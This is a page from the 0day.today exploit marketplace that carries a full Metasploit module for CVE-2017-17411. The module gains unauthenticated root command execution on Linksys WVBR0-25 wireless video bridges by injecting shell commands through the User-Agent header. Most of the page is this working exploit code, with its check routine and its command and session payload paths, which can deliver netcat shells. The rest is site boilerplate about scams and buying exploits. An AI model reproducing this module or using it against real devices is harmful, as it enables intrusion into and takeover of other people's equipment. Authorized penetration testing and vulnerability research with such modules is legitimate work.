0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linksys WVBR0-25 User-Agent Command Execution Exploit
Author
Risk
[
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Linksys WVBR0-25 User-Agent Command Execution', 'Description' => %q{ The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to connect wireless Genie cable boxes to the Genie DVR, is vulnerable to OS command injection in version < 1.0.41 of the web management portal via the User-Agent header. Authentication is not required to exploit this vulnerability. }, 'Author' => [ 'HeadlessZeke' # Vulnerability discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2017-17411'], ['ZDI', '17-973'], ['URL', 'https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair'] ], 'DisclosureDate' => 'Dec 13 2017', 'Privileged' => true, 'Payload' => { 'DisableNops' => true, 'Space' => 1024, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic netcat' } }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [[ 'Automatic', { }]], 'DefaultTarget' => 0 )) end def check check_str = rand_text_alpha(8) begin res = send_request_raw({ 'method' => 'GET', 'uri' => '/', 'agent' => "\"; printf \"#{check_str}" }) if res && res.code == 200 && res.body.to_s.include?(Rex::Text.md5(check_str)) return Exploit::CheckCode::Vulnerable end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Safe end def exploit print_status("#{peer} - Trying to access the device ...") unless check == Exploit::CheckCode::Vulnerable fail_with(Failure::NotVulnerable, "#{peer} - Failed to access the vulnerable device") end print_status("#{peer} - Exploiting...") if datastore['PAYLOAD'] == 'cmd/unix/generic' exploit_cmd else exploit_session end end def exploit_cmd beg_boundary = rand_text_alpha(8) begin res = send_request_raw({ 'method' => 'GET', 'uri' => '/', 'agent' => "\"; echo #{beg_boundary}; #{payload.encoded} #" }) if res && res.code == 200 && res.body.to_s =~ /#{beg_boundary}/ print_good("#{peer} - Command sent successfully") if res.body.to_s =~ /ret :.+?#{beg_boundary}(.*)/ # all output ends up on one line print_status("#{peer} - Command output: #{$1}") end else fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed") end rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end def exploit_session begin send_request_raw({ 'method' => 'GET', 'uri' => '/', 'agent' => "\"; #{payload.encoded} #" }) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end # 0day.today [2024-09-28] #